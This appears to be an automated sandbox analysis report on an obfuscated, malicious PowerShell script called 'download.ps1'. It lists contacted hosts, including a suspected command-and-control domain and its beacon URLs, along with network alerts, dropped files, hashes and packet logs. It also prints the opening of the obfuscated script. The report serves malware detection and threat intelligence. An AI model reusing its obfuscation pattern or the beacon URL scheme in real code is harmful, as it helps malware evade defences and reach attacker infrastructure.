                                                                                                https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://0.google.powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://0.google.com/powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.google.com/logos/doodles/2024/yearpowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifXpowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              45.61.136.138
                                                                                                                              cmacnnkfbhlcncm.topUnited States
                                                                                                                              40676AS40676USfalse
                                                                                                                              142.250.181.132
                                                                                                                              www.google.comUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                              Analysis ID:1579001
                                                                                                                              Start date and time:2024-12-20 17:33:57 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 4m 36s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:14
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:download.ps1
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal68.evad.winPS1@2/7@2/2
                                                                                                                              EGA Information:Failed
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 95%
                                                                                                                              • Number of executed functions: 20
                                                                                                                              • Number of non-executed functions: 5
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .ps1
                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 644 because it is empty
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                              • VT rate limit hit for: download.ps1
                                                                                                                              TimeTypeDescription
                                                                                                                              11:34:55API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • cmacnnkfbhlcncm.top/h5raxn90w1htr.php?id=user-PC&key=130484823816&s=527
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 107.160.112.122
                                                                                                                              QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 107.160.131.254
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 23.179.110.68
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.61.136.138
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:NlllulVsHh:NllUGH
                                                                                                                              MD5:E396A80CD8E90276EF876FC94B5CFF7A
                                                                                                                              SHA1:6A7ED0E4173A27630A7FC30F3C325EF9D031D495
                                                                                                                              SHA-256:8B604E9275EE1B6552C36CB85EAE692225A510A26942C4AC17C68046DE9F1516
                                                                                                                              SHA-512:1CD3AD1E23744327701BF26DBAECCCA8FF426D40FACDA77F067C3A56111E9E3A48DA3EF4B990476253C73F0B08E8C4F49375422A80216BD7DD2C57995AF4AFE4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:@...e...................................2............@..........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6225
                                                                                                                              Entropy (8bit):3.7419014598304
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:uO2+i6zuC9U20j8ukvhkvklCyw4a+jdl6iSogZoQJOJa6+jdl0iSogZoQJOJO1:S+TzuCSrpkvhkvCCt7+jduHs+jd0HH
                                                                                                                              MD5:1059F387F46686D0977809997B5A8E8A
                                                                                                                              SHA1:7C0BB71782DE878B491A9A76508667E9B102339C
                                                                                                                              SHA-256:D80FFE58FD3E0EA7D639F880BBB419EC06D27154F8B682CF56714C8DA8E35BA2
                                                                                                                              SHA-512:51BD0078661D4845098D7F04FD072993CB3EEB6588CD1FA7FE342CB186A221A505E168EB296C68A9477F4959A362C6C6CD4E9915C83BF9233CA55D544C67A9CA
                                                                                                                              Malicious:false
                                                                                                                              Preview:...................................FL..................F.".. .....*_...a.S..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.......R....a..R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.YX...........................3*N.A.p.p.D.a.t.a...B.V.1......YV...Roaming.@......EW.=.YV............................!=.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.YS...............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.YS............................H..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.YS.....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.YS.....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.YZ.....9...........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6225
                                                                                                                              Entropy (8bit):3.7419014598304
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:uO2+i6zuC9U20j8ukvhkvklCyw4a+jdl6iSogZoQJOJa6+jdl0iSogZoQJOJO1:S+TzuCSrpkvhkvCCt7+jduHs+jd0HH
                                                                                                                              MD5:1059F387F46686D0977809997B5A8E8A
                                                                                                                              SHA1:7C0BB71782DE878B491A9A76508667E9B102339C
                                                                                                                              SHA-256:D80FFE58FD3E0EA7D639F880BBB419EC06D27154F8B682CF56714C8DA8E35BA2
                                                                                                                              SHA-512:51BD0078661D4845098D7F04FD072993CB3EEB6588CD1FA7FE342CB186A221A505E168EB296C68A9477F4959A362C6C6CD4E9915C83BF9233CA55D544C67A9CA
                                                                                                                              Malicious:false
                                                                                                                              Preview:...................................FL..................F.".. .....*_...a.S..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.......R....a..R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.YX...........................3*N.A.p.p.D.a.t.a...B.V.1......YV...Roaming.@......EW.=.YV............................!=.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.YS...............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.YS............................H..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.YS.....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.YS.....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.YZ.....9...........
                                                                                                                              File type:ASCII text, with very long lines (11087), with CRLF line terminators
                                                                                                                              Entropy (8bit):6.0047648383145775
                                                                                                                              TrID:
                                                                                                                                File name:download.ps1
                                                                                                                                File size:20'059 bytes
                                                                                                                                MD5:506d528176abebda1202676b0528e974
                                                                                                                                SHA1:58036f821fad918c508ed11270e2df7474b3a2e3
                                                                                                                                SHA256:bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95
                                                                                                                                SHA512:9266f19b578ef6180585ea531c91878e1fd3d40ca204b60951746edb3eed4c7b6e119ceab1811287216c9f023bfdd511f3109a964ccaf68caf8692dac51d50a2
                                                                                                                                SSDEEP:384:Aij/eeL5dYClhTpoPzuOInAwy7rtefXgxl5vfMim7P:zmSdjzyzuOFvtefXgxlFEF
                                                                                                                                TLSH:CF927E95FBC8F8C2C5CEA61EA4177C443B8270AED5F3ADC4B6C5C6C1A2813556AD4D82
                                                                                                                                File Content Preview:$vnhmefubpw=$executioncontext;$isesenarateranerenor = ([char[]]@((-7434+7487),(-6272+6324),(8401-8344),(-4633+(10159-5476)),(-6874+(2253+4677)),(378378/7007),(333592/5957),(3330-(8577225/2619)),(67595/(2169-940)),(186-136),(-5822+(7180-1302)),(28992/(3793
                                                                                                                                Icon Hash:3270d6baae77db44
                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-20T17:34:58.369189+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.7524521.1.1.153UDP
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 20, 2024 17:34:58.603890896 CET4970080192.168.2.745.61.136.138
                                                                                                                                Dec 20, 2024 17:34:58.723922968 CET804970045.61.136.138192.168.2.7
                                                                                                                                Dec 20, 2024 17:34:58.724117041 CET4970080192.168.2.745.61.136.138
                                                                                                                                Dec 20, 2024 17:34:58.727257967 CET4970080192.168.2.745.61.136.138
                                                                                                                                Dec 20, 2024 17:34:58.847430944 CET804970045.61.136.138192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:00.044008017 CET804970045.61.136.138192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:00.094046116 CET4970080192.168.2.745.61.136.138
                                                                                                                                Dec 20, 2024 17:35:00.185856104 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:00.305354118 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:00.305521011 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:00.305747032 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:00.425581932 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113485098 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113584042 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113621950 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113656998 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.113723040 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113758087 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113765001 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.113794088 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113828897 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.113830090 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.114182949 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.114217043 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.114233017 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.114264965 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.114305019 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.233639002 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.233736038 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.233855009 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.305389881 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.305591106 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.305681944 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.309583902 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.310748100 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.310822964 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.310993910 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.319253922 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.319360018 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.322287083 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.322791100 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.322901011 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.328608036 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.335803032 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.335908890 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.335958958 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.339937925 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.339994907 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.349483967 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.349978924 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.350081921 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.353640079 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.363280058 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.363328934 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.363363028 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.367403030 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.367458105 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.376882076 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.377058983 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.377115965 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.381103992 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.390666962 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.390728951 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.425386906 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.425951004 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.426011086 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.429583073 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.430097103 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.430151939 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.497140884 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.497278929 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.497390985 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.499660969 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.499877930 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.499921083 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.504631042 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.506493092 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.506541014 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.507524967 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.511467934 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.511524916 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.511806011 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.511939049 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.511971951 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.516799927 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.524108887 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.524183035 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.524198055 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.526516914 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.526559114 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.537810087 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.537928104 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.538007975 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.540293932 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.551433086 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.551553011 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:02.551887989 CET8049701142.250.181.132192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:02.593997002 CET4970180192.168.2.7142.250.181.132
                                                                                                                                Dec 20, 2024 17:35:03.134183884 CET4970080192.168.2.745.61.136.138
                                                                                                                                Dec 20, 2024 17:35:03.134418964 CET4970180192.168.2.7142.250.181.132
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 20, 2024 17:34:58.369189024 CET5245253192.168.2.71.1.1.1
                                                                                                                                Dec 20, 2024 17:34:58.583211899 CET53524521.1.1.1192.168.2.7
                                                                                                                                Dec 20, 2024 17:35:00.045572042 CET4979253192.168.2.71.1.1.1
                                                                                                                                Dec 20, 2024 17:35:00.182825089 CET53497921.1.1.1192.168.2.7
                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
